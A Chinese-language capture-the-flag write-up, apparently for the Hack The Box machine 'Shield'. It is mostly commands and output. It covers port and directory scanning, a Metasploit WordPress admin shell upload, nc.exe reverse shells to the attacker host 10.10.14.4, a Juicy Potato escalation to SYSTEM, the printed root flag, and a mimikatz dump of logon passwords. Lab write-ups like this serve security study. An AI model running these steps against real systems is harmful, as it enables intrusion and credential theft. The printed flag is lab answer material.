端口扫描
kali@kali:~$ nmap -p- --min-rate=1000 -T4 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:59 EDT
Nmap scan report for bogon (10.10.10.29)
Host is up (0.26s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
3306/tcp open mysql
gobuster下载安装并执行
$./gobuster dir -u http://10.10.10.29/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.29/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/10 06:17:10 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/08/10 06:19:12 Finished
===============================================================
通过msfconsole进入服务器
msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > run # 必须在exploit/unix/webapp/wp_admin_shell_upload该目录下
将netcat二进制文件上载到计算机以获得更稳定的外壳
- 打开vbox虚拟机某目录
lcd /usr/share/windows-resources/binaries/
- 打开10.10.10.29某目录
cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
- 上传
/usr/share/windows-resources/binaries/nc.exe文件
upload nc.exe
如果上传失败,可能已存在
- vbox虚拟机监听端口1234
nc -lvp 1234
- msf 连接 vbox 1234端口
msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.4 1234"
- 在vbox虚机
nc -lvp 1234可正常执行命令操作10.10.10.29
权限提升
判断10.10.10.29的系统
meterpreter > sysinfo
Computer : SHIELD
OS : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows
发现Windows Server 2016操作系统,容易受到Rotten Potato攻击
Juicy Potato
Juicy Potato是该漏洞利用程序的一种变体,它通过利用MiTM攻击中的BITS和SeAssignPrimaryToken或SeImpersonate特权,允许Windows上的服务帐户升级为SYSTEM(最高特权)。
我们可以通过上传Juicy Potato二进制文件并执行它来利用它。和以前一样,我们可以使用meterpreter shell进行上传,然后可以使用netcat shell执行漏洞利用。
- 下载Juicy Potato
- 上传
upload JuicyPotato.exe
- 在nc容口中向windows上创建批处理文件
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.4 1111 > shell.bat
- 在vbox启动另一个nc窗口
nc -lvp 1111
- 执行JuicyPotato.exe
JuicyPotato.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
- 在nc 1111窗口中执行whoami
PS C:\Windows\system32> whoami
whoami
nt authority\system
发现已经是管理员
- 获取
C:\Users\Administrator\Desktop\root.txt文件内容
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
6e9a9fdc6f64e410a68b847bb4b404fa
通过mimikatz获取其它密码
下载mimikatz.exe并在meterpreter中通过upload上传至window
在管理权限控制台中执行./mimikatz.exe
在mimikatz中执行sekurlsa::logonpasswords
获取到账号及密码sandra/Password1234!
